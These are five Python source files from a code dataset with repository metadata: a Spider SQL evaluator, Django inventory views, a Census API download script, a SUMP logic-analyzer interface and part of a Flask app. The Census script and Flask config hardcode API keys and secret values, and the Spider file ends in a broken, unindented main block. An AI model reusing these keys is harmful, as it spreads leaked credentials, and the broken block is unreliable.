        if not is_col_valid(cond[2][1], True):
            return False
        if not is_col_valid(cond[2][2], True):
            return False
    for cond in having_conds:
        if isinstance(cond[3], dict) and not is_sql_valid(cond[3], schema):
            return False
        if not is_col_valid(cond[2][1]):
            return False
        if not is_col_valid(cond[2][2]):
            return False
    groupBy = _sql['groupBy']
    for col_unit in groupBy:
        if not is_col_valid(col_unit):
            return False
    if len(_sql['orderBy']) > 0:
        orderBy = _sql['orderBy'][1]
        for val_unit in orderBy:
            if not is_col_valid(val_unit[1]):
                return False
            if not is_col_valid(val_unit[2]):
                return False
    return True
def is_sql_valid(_sql, schema):
    """Validate a full parsed SQL dict, including its first IUE sub-query.

    Only the first non-empty clause among except/union/intersect (in that
    order) is checked, matching the original elif chain; the outer query
    itself is always checked last.
    """
    for clause in ('except', 'union', 'intersect'):
        nested = _sql[clause]
        if nested:
            if not is_query_valid(nested, schema):
                return False
            break
    return is_query_valid(_sql, schema)
# Define new evaluator
@registry.register('evaluator', 'spider')
class SpiderSqlEvaluator:
    """Exact-match evaluator for decoded Spider SQL hypotheses.

    Thin wrapper around the official Spider ``Evaluator``
    (``SpiderEvaluator``) that prunes structurally invalid hypotheses,
    canonicalises predicted and gold parses (value stripping plus
    foreign-key column aliasing) and reports exact-match / partial
    component scores bucketed by query hardness.
    """

    def __init__(self, transition_system, args):
        # Both arguments exist only to satisfy the registry's evaluator
        # construction interface; the evaluator itself is stateless.
        pass

    @staticmethod
    def print_results(results, p_func=print):
        """Pretty-print a score dict produced by ``evaluate_dataset``."""
        print_scores(results, 'match', p_func=p_func)

    @staticmethod
    def evaluate_dataset(examples, decode_results, out_path, fast_mode=True,
                         test_mode='dev', save_failed_samples=False):
        """Score decoded hypotheses against the gold Spider SQL.

        Args:
            examples: dataset examples exposing ``sql`` (gold parse),
                ``schema`` and the target action sequence.
            decode_results: one list of hypotheses per example, best first.
            out_path: directory for failure reports / pickles (only used
                when ``save_failed_samples`` is True).
            fast_mode: if True, evaluate only the best structurally valid
                hypothesis and collect detailed per-hardness partial scores;
                otherwise count an example correct if *any* valid hypothesis
                matches the gold exactly.
            test_mode: unused; kept for interface compatibility.
            save_failed_samples: fast mode only -- dump one markdown report
                per mismatching example plus a pickle of all predictions.

        Returns:
            dict of scores; always contains the overall ``'accuracy'``.
        """
        evaluator = SpiderEvaluator()
        if fast_mode:
            levels = ['easy', 'medium', 'hard', 'extra', 'all']
            partial_types = ['select', 'select(no AGG)', 'where', 'where(no OP)', 'group(no Having)',
                             'group', 'order', 'and/or', 'IUEN', 'keywords']
            etype = 'match'

            scores = {}
            # Init scores
            for level in levels:
                scores[level] = {'count': 0, 'partial': {}, 'exact': 0.}
                for type_ in partial_types:
                    scores[level]['partial'][type_] = {
                        'acc': 0., 'rec': 0., 'f1': 0., 'acc_count': 0, 'rec_count': 0}

            # Accumulators pickled at the end for offline error analysis.
            pred_sql = []
            gold_sql = []
            pred_actions = []
            gold_actions = []
            questions = []
            eval_err_num = 0
            idx = 0
            for example, spider_sql in zip(examples, decode_results):
                # Drop hypotheses that are structurally invalid for the schema.
                pruned_hyps = []
                for hyp in spider_sql:
                    if is_sql_valid(hyp.code, example.schema):
                        pruned_hyps.append(hyp)
                gold_spider_sql = example.sql
                # Deep-copy before the rebuild_* helpers mutate parses in place.
                _gold_spider_sql = deepcopy(gold_spider_sql)
                pred_spider_sql = pruned_hyps[:1]
                if not pred_spider_sql:
                    # dummy sql
                    surface_sql = 'SELECT *'
                else:
                    surface_sql = SpiderAST(pred_spider_sql[0].code, example.schema._table).get_sql()
                if not pred_spider_sql:
                    # No valid hypothesis at all: score an empty query instead.
                    p_sql = {
                        "except": None,
                        "from": {
                            "conds": [],
                            "table_units": []
                        },
                        "groupBy": [],
                        "having": [],
                        "intersect": None,
                        "limit": None,
                        "orderBy": [],
                        "select": [
                            False,
                            []
                        ],
                        "union": None,
                        "where": []
                    }
                    pred_spider_sql = SpiderDecodeHypothesis(example.schema)
                    pred_spider_sql.code = p_sql
                    eval_err_num += 1
                else:
                    pred_spider_sql = pred_spider_sql[0]
                _pred_spider_sql = deepcopy(pred_spider_sql.code)

                # Canonicalise both parses: strip literal values and collapse
                # foreign-key columns onto a single representative id.
                schema = example.schema
                kmap = build_foreign_key_map(example.schema._table)
                g_valid_col_units = build_valid_col_units(
                    gold_spider_sql['from']['table_units'], schema)
                gold_spider_sql = rebuild_sql_val(gold_spider_sql)
                gold_spider_sql = rebuild_sql_col(g_valid_col_units, gold_spider_sql, kmap)
                p_valid_col_units = build_valid_col_units(
                    pred_spider_sql.code['from']['table_units'], schema)
                pred_spider_sql.code = rebuild_sql_val(pred_spider_sql.code)
                pred_spider_sql.code = rebuild_sql_col(
                    p_valid_col_units, pred_spider_sql.code, kmap)

                hardness = evaluator.eval_hardness(gold_spider_sql)
                scores[hardness]['count'] += 1
                scores['all']['count'] += 1

                exact_score = evaluator.eval_exact_match(pred_spider_sql.code, gold_spider_sql)
                if exact_score == 0 and save_failed_samples:
                    # Dump a per-example markdown report of the mismatch.
                    # BUG FIX: the diff lists below were previously bound to
                    # `pred_actions` / `gold_actions`, silently clobbering the
                    # accumulator lists that are pickled after the loop.  The
                    # file is now also closed via a context manager.
                    with open(os.path.join(out_path, "%d-%s.md" % (idx, hardness)), "w") as f_out:
                        f_out.write('### Question\n%s\n' % example.original)
                        f_out.write('\n### Spider SQL\n')
                        f_out.write('- ***pred***: ')
                        f_out.write('%s\n' % surface_sql)
                        f_out.write('- ***gold***: ')
                        f_out.write('%s\n' % example.tgt_code)
                        f_out.write('\n### Action Sequences Diff\n')
                        pred_action_strs = [str(a).replace('*', '\\*')
                                            for a in pred_spider_sql.actions]
                        gold_action_strs = [str(a.action).replace('*', '\\*')
                                            for a in example.tgt_actions]
                        for line in difflib.unified_diff(pred_action_strs, gold_action_strs,
                                                         fromfile='pred', tofile='gold'):
                            f_out.write('\t%s\n' % line)
                        f_out.write('\n### Schema\n')
                        f_out.write('\tcol_id,\ttab_name,\tcol_name\n')
                        for _id, (tab_id, col_name) in enumerate(example.schema._table['exp_column_names_original']):
                            f_out.write('\t%d,\t%s,\t%s\n' % (
                                _id, example.schema._table['exp_table_names_original'][tab_id], col_name))
                        f_out.write('\n### Primary Keys\n%s\n' %
                                    str(example.schema._table['exp_primary_keys']))
                questions.append(" ".join(example.src_sent))
                pred_sql.append(_pred_spider_sql)
                gold_sql.append(_gold_spider_sql)
                pred_actions.append(pred_spider_sql.actions)
                gold_actions.append([a.action for a in example.tgt_actions])

                partial_scores = evaluator.partial_scores
                scores[hardness]['exact'] += exact_score
                scores['all']['exact'] += exact_score
                for type_ in partial_types:
                    if partial_scores[type_]['pred_total'] > 0:
                        scores[hardness]['partial'][type_]['acc'] += partial_scores[type_]['acc']
                        scores[hardness]['partial'][type_]['acc_count'] += 1
                    if partial_scores[type_]['label_total'] > 0:
                        scores[hardness]['partial'][type_]['rec'] += partial_scores[type_]['rec']
                        scores[hardness]['partial'][type_]['rec_count'] += 1
                    scores[hardness]['partial'][type_]['f1'] += partial_scores[type_]['f1']
                    if partial_scores[type_]['pred_total'] > 0:
                        scores['all']['partial'][type_]['acc'] += partial_scores[type_]['acc']
                        scores['all']['partial'][type_]['acc_count'] += 1
                    if partial_scores[type_]['label_total'] > 0:
                        scores['all']['partial'][type_]['rec'] += partial_scores[type_]['rec']
                        scores['all']['partial'][type_]['rec_count'] += 1
                    scores['all']['partial'][type_]['f1'] += partial_scores[type_]['f1']
                idx += 1

            # Convert accumulated sums into averages per hardness level.
            for level in levels:
                if scores[level]['count'] == 0:
                    continue
                if etype in ["all", "match"]:
                    scores[level]['exact'] /= scores[level]['count']
                    for type_ in partial_types:
                        if scores[level]['partial'][type_]['acc_count'] == 0:
                            scores[level]['partial'][type_]['acc'] = 0
                        else:
                            scores[level]['partial'][type_]['acc'] = scores[level]['partial'][type_]['acc'] /\
                                scores[level]['partial'][type_]['acc_count'] * 1.0
                        if scores[level]['partial'][type_]['rec_count'] == 0:
                            scores[level]['partial'][type_]['rec'] = 0
                        else:
                            scores[level]['partial'][type_]['rec'] = scores[level]['partial'][type_]['rec'] /\
                                scores[level]['partial'][type_]['rec_count'] * 1.0
                        if scores[level]['partial'][type_]['acc'] == 0 and scores[level]['partial'][type_]['rec'] == 0:
                            scores[level]['partial'][type_]['f1'] = 1
                        else:
                            scores[level]['partial'][type_]['f1'] = \
                                2.0 * scores[level]['partial'][type_]['acc'] * scores[level]['partial'][type_]['rec'] /\
                                (scores[level]['partial'][type_]['rec'] + scores[level]['partial'][type_]['acc'])
            scores["accuracy"] = scores["all"]["exact"]

            out_dict = {
                "questions": questions,
                "pred_sql": pred_sql,
                "gold_sql": gold_sql,
                "pred_actions": pred_actions,
                "gold_actions": gold_actions,
            }
            print("eval_err_num:{}".format(eval_err_num))
            if save_failed_samples:
                with open(os.path.join(out_path, "failed_samples.pkl"), "wb") as out:
                    pickle.dump(out_dict, out)
        else:
            # Oracle-style accuracy: correct if ANY valid hypothesis matches.
            scores = {'accuracy': 0.0}
            for example, spider_sql in zip(examples, decode_results):
                pruned_hyps = []
                for hyp in spider_sql:
                    if is_sql_valid(hyp.code, example.schema):
                        pruned_hyps.append(hyp)
                gold_spider_sql = example.sql
                schema = example.schema
                kmap = build_foreign_key_map(example.schema._table)
                g_valid_col_units = build_valid_col_units(
                    gold_spider_sql['from']['table_units'], schema)
                gold_spider_sql = rebuild_sql_val(gold_spider_sql)
                gold_spider_sql = rebuild_sql_col(g_valid_col_units, gold_spider_sql, kmap)
                flag = False
                for hyp in pruned_hyps:
                    p_valid_col_units = build_valid_col_units(
                        hyp.code['from']['table_units'], schema)
                    hyp.code = rebuild_sql_val(hyp.code)
                    hyp.code = rebuild_sql_col(p_valid_col_units, hyp.code, kmap)
                    exact_score = evaluator.eval_exact_match(hyp.code, gold_spider_sql)
                    if exact_score:
                        flag = True
                        break
                scores['accuracy'] += 1.0 if flag else 0.0
            scores['accuracy'] /= len(examples)
        return scores
@registry.register('evaluator', 'spider-action-evaluator')
def create_spider_action_prediction_evaluator(transition_system, eval_top_pred_only=True, for_inference=False):
    """Build the evaluation callback used by the training / inference loop.

    The returned closure converts decoded action trees into Spider SQL
    parses via *transition_system* and either writes the predicted SQL
    strings to ``predicted_sql.txt`` (``for_inference``) or scores them
    with ``SpiderSqlEvaluator``.
    """
    def evaluate_action_predictions(examples, predictions, exp_dir_path):
        """
        @param examples: list(example) -- dataset examples with schemas
        @param predictions: list(list(hypothesis)) -- decode hypotheses per example
        @param exp_dir_path: str or None -- experiment dir for eval artifacts
        @return: accuracy float (training mode) or the list of predicted SQL
            strings (inference mode, also written to predicted_sql.txt)
        """
        eva_output_path = None
        if (exp_dir_path is not None) and (not for_inference):
            eva_output_path = os.path.join(exp_dir_path, 'eval_output')
            if not os.path.exists(eva_output_path):
                os.makedirs(eva_output_path)
        logger = logging.getLogger()
        code_results = list()
        for data_idx, pred in enumerate(predictions):
            decoded_hyps = list()
            for hyp_id, hyp in enumerate(pred):
                try:
                    hyp.code = transition_system.ast_to_surface_code(
                        hyp.tree, examples[data_idx].schema
                    )
                    decoded_hyps.append(hyp)
                except Exception:
                    # A malformed tree only drops that hypothesis; keep going.
                    logger.error('Exception in converting tree to code:')
                    logger.error(traceback.format_stack())
                    logger.error(traceback.format_exc())
                    logger.error('-' * 60)
                    logger.error('Example: %s\nIntent: %s\nTarget Code:\n%s\nHypothesis[%d]:\n%s' % (
                        data_idx, ' '.join(examples[data_idx].src_sent),
                        examples[data_idx].tgt_code, hyp_id, hyp.tree.to_string()
                    ))
                    logger.error('-' * 60)
            code_results.append(decoded_hyps)
        if for_inference:
            eval_result = []
            for example, spider_sql in zip(examples, code_results):
                # Keep only schema-valid hypotheses; take the best one.
                pruned_hyps = []
                for hyp in spider_sql:
                    if is_sql_valid(hyp.code, example.schema):
                        pruned_hyps.append(hyp)
                pred_spider_sql = pruned_hyps[:1]
                if not pred_spider_sql:
                    # dummy sql
                    surface_sql = 'SELECT *'
                else:
                    pred_spider_sql = pred_spider_sql[0].code
                    surface_sql = SpiderAST(pred_spider_sql, example.schema._table).get_sql()
                eval_result.append(surface_sql)
            with open('predicted_sql.txt', 'w') as f:
                for q in eval_result:
                    f.write(q + '\n')
        else:
            evaluator = SpiderSqlEvaluator(None, None)
            eval_results = evaluator.evaluate_dataset(
                examples, code_results, eva_output_path, fast_mode=eval_top_pred_only,
                test_mode='dev', save_failed_samples=eva_output_path is not None)
            print_scores(eval_results, 'match', p_func=logger.info)
            eval_result = eval_results['accuracy']
        return eval_result
    return evaluate_action_predictions
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--gold', dest='gold', type=str)
parser.add_argument('--pred', dest='pred', type=str)
parser.add_argument('--db', dest='db', type=str)
parser.add_argument('--table', dest='table', type=str)
parser.add_argument('--etype', dest='etype', type=str)
args = parser.parse_args()
gold = args.gold
pred = args.pred
db_dir = args.db
table = args.table
etype = args.etype
assert etype in ["all", "exec", "match"], "Unknown evaluation method"
kmaps = build_foreign_key_map_from_json(table)
evaluate(gold, pred, db_dir, etype, kmaps)
| BorealisAI/DT-Fixup | spider/semparser/modules/semantic_parser/evaluator/spider_evaluator.py | spider_evaluator.py | py | 47,165 | python | en | code | 15 | github-code | 36 | [
{
"api_name": "sqlite3.connect",
"line_number": 461,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 538,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 538,
"usage_type": "attribute"
},
{
"api_name": "semparser.modules.semant... |
27102778456 | from django.shortcuts import render
import json
from django.core import serializers
from django.http import (
HttpResponse,
HttpResponseRedirect,
JsonResponse,
)
from django.template import loader
from django.core.urlresolvers import reverse_lazy
from django.contrib.auth.decorators import login_required
from django.views.generic import (
ListView,
View
)
from django.views.generic.detail import DetailView
from django.views.generic.edit import (
CreateView,
UpdateView,
DeleteView
)
from django.http import JsonResponse
from django.views.generic import TemplateView
from django.contrib.messages.views import SuccessMessageMixin
from .models import MateriaPrima
from proveedores.mixins import JSONResponseMixin
from .forms import MateriaPrimaForm
from loginusers.mixins import LoginRequiredMixin
class ListarMateriaPrima(LoginRequiredMixin, JSONResponseMixin, ListView):
    """JSON list of raw materials, filterable by the ``term`` query parameter."""
    model = MateriaPrima
    template_name = 'materiaprima_list.html'
    paginate_by = 5

    def get(self, request, *args, **kwargs):
        # Serve the (possibly filtered) queryset as JSON instead of HTML.
        self.object_list = self.get_queryset()
        return self.render_to_json_response()

    def get_data(self):
        # id/value shape expected by jQuery-UI style autocomplete widgets.
        return [
            {'id': materia.id, 'value': materia.nombre}
            for materia in self.object_list
        ]

    def get_queryset(self):
        term = self.request.GET.get('term', None)
        if not term:
            return super(ListarMateriaPrima, self).get_queryset()
        return self.model.objects.filter(nombre__icontains=term)
class CrearMateriaPrima(LoginRequiredMixin, SuccessMessageMixin, CreateView):
    """Create view for raw materials with a success flash message."""
    model = MateriaPrima
    form_class = MateriaPrimaForm
    success_url = reverse_lazy('materiaprim:materiaPrimaForm')
    success_message = 'La materia prima %(nombre)s se registro en el sistema'
class ModificarMateriaPrima(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
    """Update view for raw materials, looked up by the ``id`` slug."""
    model = MateriaPrima
    form_class = MateriaPrimaForm
    slug_field = 'id'
    slug_url_kwarg = 'id'
    success_url = reverse_lazy('materiaprim:materiaPrimaForm')
    success_message = 'Los datos de la materia prima %(nombre)s se actualizaron'
class ActualizarEstadoView(JSONResponseMixin, View):
    """POST endpoint that soft-deletes a raw material by clearing ``estado``."""
    object = None
    relacion = None

    def post(self, request):
        """Deactivate the MateriaPrima whose ``id`` arrives in the POST body."""
        id = self.request.POST.get('id', None)
        materia = None
        try:
            materia = MateriaPrima.objects.get(id=id)
        except MateriaPrima.DoesNotExist:
            # Unknown id: leave self.object as None so get_data reports failure.
            self.object = None
        if materia is not None:
            materia.estado = False
            materia.save()
            self.object = materia
        return self.render_to_json_response()

    def get_data(self):
        """Build the JSON payload describing the outcome of the update."""
        if self.object is not None:
            data = {
                # BUG FIX: message previously read 'materia rima'.
                'message': 'Se inhabilito la materia prima',
            }
        else:
            data = {
                'message': 'Esta materia prima se encuentra asociada'
            }
        return data
class ConsultarMateriaPrima(LoginRequiredMixin, JSONResponseMixin, DetailView):
    """JSON detail view for one raw material, looked up by the ``id`` slug."""
    model = MateriaPrima
    slug_field = 'id'
    slug_url_kwarg = 'id'

    def get(self, request, *args, **kwargs):
        # Serve JSON instead of rendering a template.
        self.object = self.get_object()
        return self.render_to_json_response()

    def get_data(self):
        """Return a 200 payload with the record, or a 404-style message."""
        if self.object is not None:
            data = {
                'status': 200,
                'materia': {
                    'id': self.object.id,
                    'nombre': self.object.nombre,
                    'descripcion': self.object.descripcion,
                    'unidad_medida': self.object.unidad_medida.nombre,
                    'categoria': self.object.categoria.nombre,
                    'cantidad': self.object.cantidad,
                    'estado': self.object.estado
                }
            }
        else:
            data = {
                'status': 404,
                'message': 'La materia prima no se encuentra registrada'
            }
        return data

    def get_object(self, queryset=None):
        # Hand-copied from Django's SingleObjectMixin.get_object, except it
        # returns None on a miss instead of raising Http404.
        if queryset is None:
            queryset = self.get_queryset()
        pk = self.kwargs.get(self.pk_url_kwarg)
        slug = self.kwargs.get(self.slug_url_kwarg)
        if pk is not None:
            queryset = queryset.filter(pk=pk)
        if slug is not None and (pk is None or self.query_pk_and_slug):
            slug_field = self.get_slug_field()
            queryset = queryset.filter(**{slug_field: slug})
        if pk is None and slug is None:
            raise AttributeError("Generic detail view %s must be called with "
                                 "either an object pk or a slug."
                                 % self.__class__.__name__)
        try:
            obj = queryset.get()
        except queryset.model.DoesNotExist:
            obj = None
        return obj
class MateriaPrimaView(LoginRequiredMixin, TemplateView):
    """Render the raw-material form page with a fresh, unbound form."""
    template_name = 'materiaprima/materiaprima_form.html'

    def get_context_data(self, **kwargs):
        context = super(MateriaPrimaView, self).get_context_data(**kwargs)
        context['form'] = MateriaPrimaForm()
        return context
| IvanVilla1585/RefrescosChupiFlum | ChupiFlum/materiaprima/views.py | views.py | py | 5,202 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "loginusers.mixins.LoginRequiredMixin",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "proveedores.mixins.JSONResponseMixin",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "django.views.generic.ListView",
"line_number": 32,
"usage_type"... |
40117095233 | """
pop_by_tract.py (Script 1/3)
Date updated: 5/11/2023
Imports DC population data by census tract from Census API.
"""
"""
Requires:
- Census API key, which can be acquired here: https://api.census.gov/data/key_signup.html
Output:
- "pop_by_tract_2020.csv"
"""
#%%
## Set working directory to script directory "2020_Analysis"
## Note: Be sure that the required input files are located in the "2020_Analysis"
## folder as well.
import os
os.chdir(os.path.dirname(__file__))
#%%
# Import modules
import requests
import pandas as pd
import numpy as np
#%%
## API call
# Variable dictionary
variables = {'B02001_001E':'pop_total', 'B02001_002E':'pop_white',
'B25003_001E':'housing_total', 'B25003_002E':'housing_owned',
'B25003_003E':'housing_rental'}
# Variable list
var_list = variables.keys()
# Variable string (comma-separated)
var_string = ",".join(var_list)
# URL
api = 'https://api.census.gov/data/2020/acs/acs5'
# Set geographic unit
for_clause = 'tract:*'
# Select NY
in_clause = 'state:11 county:001'
key_value = 'f382fd0108eba2b32808ba82bcccc82861d0b53a'
# API call
payload = {'get':var_string, 'for':for_clause, 'in':in_clause, 'key':key_value}
response = requests.get(api, payload)
if response.status_code == 200:
print('\nAPI Request: Success\n')
else:
print(f'\nRequest status code: {response.status_code}\n{response.text}\n')
assert False
#%%
## Convert JSON to Dataframe
# List of rows
row_list = response.json()
# Set column names
colnames = row_list[0]
# Set data rows
datarows = row_list[1:]
# Pandas dataframe
pop = pd.DataFrame(columns=colnames, data=datarows)
#%%
## Prepare data
# Replace missing data with NaN
pop = pop.replace(-666666666, np.nan)
# Rename columns
pop = pop.rename(columns=variables)
# GEOID column
pop['GEOID'] = pop['state'] + pop['county'] + pop['tract']
# Set index to GEOID
pop = pop.set_index('GEOID')
# Drop columns
keep_cols = variables.values()
pop = pop[keep_cols]
#%%
## Write population by census tract to CSV
pop.to_csv('pop_by_tract_2020.csv')
print("\nDownloaded 'pop_by_tract_2020.csv'")
| tbond99/dc-historic-districts-and-gentrification | 1__2020_Analysis/1_pop_by_tract.py | 1_pop_by_tract.py | py | 2,153 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.chdir",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "requests.get",
"line_number... |
29965495383 | #!/usr/bin/env python
# import sys
import logging
import struct
import serial
from . import errors
from . import fio
from . import ops
# import settings this as settings_module to avoid name conflicts
from . import settings as settings_module
logger = logging.getLogger(__name__)
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.DEBUG)
class Interface(object):
    """Serial interface to a SUMP-protocol logic analyzer.

    NOTE: this module targets Python 2 (``xrange``; ``str`` bytes are
    written straight to the serial port).
    """
    # undivided clock rate, in Hz, from testing with OBLS
    protocol_version = '1.0'

    def __init__(
            self, path='/dev/ttyACM0', baud=115200,
            timeout=None, settings=None, **kwargs):
        """Open the port, reset the device, read metadata and push settings."""
        self.timeout = timeout
        if settings is None:
            self.settings = settings_module.Settings(**kwargs)
        else:
            self.settings = settings
            if len(kwargs):
                # Explicit kwargs override fields of a supplied Settings.
                for kw in kwargs:
                    setattr(self.settings, kw, kwargs[kw])
        self.port = serial.Serial(path, baud, timeout=self.timeout)
        self.debug_logger = None
        self.reset()
        self.metadata = self.query_metadata()
        self.send_settings()

    def reset(self):
        """Send five SUMP reset (0x00) bytes."""
        logger.debug("reset")
        self.port.write('\x00\x00\x00\x00\x00')

    def capture(self, send_settings=True):
        '''Request a capture and return the list of sampled values.'''
        logger.debug("capture")
        if send_settings:
            self.send_settings()
        # get local references to objects for faster execution ..
        logger.debug("building unpack functions")
        ufs = []
        for i in xrange(4):
            # channel_groups bits are *disable* flags: build an unpacker only
            # for each enabled group, keeping its byte position in the sample.
            if not (self.settings.channel_groups & (0b1 << i)):
                ufs.append(lambda c, si=i: ord(c) << (8 * si))
        d = []
        self.port.timeout = self.settings.timeout
        logger.debug("starting capture")
        self.port.write('\x01')  # start the capture
        logger.debug("reading capture")
        for i in xrange(self.settings.read_count):
            v = 0
            for uf in ufs:
                v |= uf(self.port.read(1))
            d.append(v)
        self.reset()  # TODO is this needed?
        if self.settings.latest_first:
            return d[::-1]
        else:
            return d

    def save(self, capture, filename, meta=None):
        """Persist a capture with the current settings via fio."""
        logger.debug("save %s", filename)
        fio.save(capture, filename, self.settings, meta)

    def id_string(self):
        '''Return device's SUMP ID string.'''
        logger.debug("id_string")
        self.port.write('\x02')
        # TODO check protocol version here
        val = self.port.read(4)  # 4 bytes as a small-endian int
        return val[::-1]

    def xon(self):
        """Resume device transmission (XON)."""
        logger.debug("xon")
        self.port.write('\x11')

    def xoff(self):
        """Pause device transmission (XOFF)."""
        logger.debug("xoff")
        self.port.write('\x13')

    def _send_trigger_mask(self, stage, mask):
        """Write the 32-bit trigger mask for *stage*."""
        logger.debug("send_trigger_mask %s %s", stage, mask)
        msg = struct.pack('<Bi', 0xC0 | (stage << 2), mask)
        self.port.write(msg)

    def _send_trigger_value(self, stage, value):
        """Write the 32-bit trigger value for *stage*."""
        logger.debug("send_trigger_value %s %s", stage, value)
        msg = struct.pack('<Bi', 0xC1 | (stage << 2), value)
        self.port.write(msg)

    def _send_trigger_configuration(
            self, stage, delay, channel, level, start, serial):
        """Write one stage's trigger configuration word."""
        logger.debug(
            "send_trigger_configuration %s %s %s %s %s %s",
            stage, delay, channel, level, start, serial)
        msg = struct.pack(
            '<BHBB',
            0xC2 | (stage << 2),
            delay,
            ((channel & 0x0F) << 4) | level,
            (start << 3) | (serial << 2) | ((channel & 0x10) >> 4))
        self.port.write(msg)

    def send_divider_settings(self, settings):
        """Write the 24-bit sample-clock divider."""
        logger.debug("send_divider_settings %s", settings.divider)
        d = settings.divider - 1  # offset 1 correction for SUMP hardware
        msg = struct.pack('<cHBx', '\x80', d & 0xFFFF, d >> 16)
        self.port.write(msg)

    def send_read_and_delay_count_settings(self, settings):
        """Write read/delay counts (rounded down to a multiple of four)."""
        logger.debug("send_read_and_delay_count_settings")
        # factor 4 correction for SUMP hardware; the rounded values are
        # written back into settings so callers see the effective counts.
        r = (settings.read_count // 4)
        settings.read_count = r * 4
        d = (settings.delay_count // 4)
        settings.delay_count = d * 4
        msg = struct.pack('<cHH', '\x81', r, d)
        self.port.write(msg)

    def send_flags_settings(self, settings):
        """Write the flags byte (invert/external/groups/filter/demux)."""
        logger.debug("send_flag_settings")
        msg = struct.pack(
            '<cBxxx', '\x82',
            (settings.inverted << 7) | (settings.external << 6) |
            (settings.channel_groups << 2) | (settings.filter << 1) |
            settings.demux)
        self.port.write(msg)

    def send_settings(self):
        """
        The order of things in this function are CRITICAL
        """
        logger.debug("send_settings")
        self.send_divider_settings(self.settings)
        trigger_enable = self.settings.trigger_enable
        if trigger_enable == 'None':
            # send always-trigger trigger settings
            for stage in xrange(self.settings.trigger_max_stages):
                self._send_trigger_configuration(stage, 0, 0, 0, True, False)
                self._send_trigger_mask(stage, 0)
                self._send_trigger_value(stage, 0)
        elif trigger_enable == 'Simple':
            # set settings from stage 0, no-op for stages 1..3
            self._send_trigger_configuration(
                0, self.settings.trigger_stages[0].delay,
                self.settings.trigger_stages[0].channel,
                0, True, self.settings.trigger_stages[0].serial)
            self._send_trigger_mask(0, self.settings.trigger_stages[0].mask)
            self._send_trigger_value(0, self.settings.trigger_stages[0].value)
            # BUG FIX: was ``self.self.settings.trigger_max_stages``, which
            # raised AttributeError whenever Simple triggering was selected.
            for stage in xrange(1, self.settings.trigger_max_stages):
                self._send_trigger_configuration(stage, 0, 0, 0, False, False)
                self._send_trigger_mask(stage, 0)
                self._send_trigger_value(stage, 0)
        elif trigger_enable == 'Complex':
            for (i, stage) in enumerate(self.settings.trigger_stages):
                # OLS needs things in this order
                self._send_trigger_mask(i, stage.mask)
                self._send_trigger_value(i, stage.value)
                self._send_trigger_configuration(
                    i, stage.delay, stage.channel, stage.level, stage.start,
                    stage.serial)
        else:
            raise errors.TriggerEnableError
        self.send_read_and_delay_count_settings(self.settings)
        self.send_flags_settings(self.settings)

    def query_metadata(self):
        '''Return metadata identifying the SUMP device,
        firmware, version, etc.'''
        logger.debug("query_metadata")
        result = []
        self.reset()
        r = self.port.read
        timeout = self.port.timeout  # save timeout setting to restore later
        try:
            # only wait 2 seconds for devices that don't do metadata
            self.port.timeout = 2
            self.port.write('\x04')
            while True:
                token = r(1)
                if not token:  # end-of-file
                    break
                token = ord(token)
                if not token:  # binary 0 end-of-metadata marker
                    break
                elif token <= 0x1F:  # C-string follows token
                    v = []
                    while True:
                        x = r(1)
                        if x != '\0':
                            v.append(x)
                        else:
                            break
                    result.append((token, ''.join(v)))
                elif token <= 0x3F:  # 32-bit int follows token
                    result.append((token, ops.big_endian(r(4))))
                elif token <= 0x5F:  # 8-bit int follows token
                    result.append((token, ord(r(1))))
                else:
                    result.append((token, None))
        finally:
            self.port.timeout = timeout  # restore timeout setting
        return result

    def close(self):
        """Close the serial port and drop the reference."""
        logger.debug("close")
        self.port.close()
        self.port = None
def open_interface(port='/dev/ttyACM0', baud=115200, **kwargs):
    """Convenience wrapper: construct and return a ready-to-use Interface."""
    return Interface(port, baud, **kwargs)
| braingram/pysump | sump/interface.py | interface.py | py | 10,286 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "logging.StreamHandler",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "serial.Ser... |
35612628358 | from flask import Flask, render_template, request
from flask_wtf import FlaskForm
from wtforms import StringField
from wtforms.validators import DataRequired
from datetime import datetime
from flask_moment import Moment
from flask_sqlalchemy import SQLAlchemy
from flask_security import Security, SQLAlchemyUserDatastore, UserMixin, RoleMixin, login_required
from flask_admin import Admin
from flask_admin.contrib.sqla import ModelView
from flask_googlemaps import GoogleMaps, Map
app = Flask(__name__)
app.config['DEBUG'] = True
# NOTE(review): SECRET_KEY, SECURITY_PASSWORD_SALT and the Google Maps API
# key are hardcoded in source -- move them to environment variables and
# revoke the committed key.
app.config['SECRET_KEY'] = '임희연'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'
app.config['SECURITY_PASSWORD_SALT'] = '임희연'
app.config['GOOGLEMAPS_KEY'] = "AIzaSyCqXCWpsYcokf52FhcNNWfZ8Ib5ScUJv9U"
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
moment = Moment(app)
db = SQLAlchemy(app)
# NOTE(review): this shadows the ``map`` builtin at module level.
map = GoogleMaps(app)
admin = Admin(app, name='HeeYeon')
# Association table linking users to roles (Flask-Security).
roles_users = db.Table('roles_users', db.Column('user_id', db.Integer(), db.ForeignKey('user.id')),
                       db.Column('role_id', db.Integer(), db.ForeignKey('role.id')))
class SearchForm(FlaskForm):
    """Single required search box ('검색' = 'search')."""
    search = StringField('검색', validators=[DataRequired()])
class MyForm(FlaskForm):
    """Single required text field, used by the /search view."""
    text = StringField('text', validators=[DataRequired()])
class Role(db.Model, RoleMixin):
    """Flask-Security role."""
    id = db.Column(db.Integer(), primary_key=True)
    name = db.Column(db.String(80), unique=True)
    description = db.Column(db.String(255))
class User(db.Model, UserMixin):
    """Flask-Security user account with a many-to-many link to roles."""
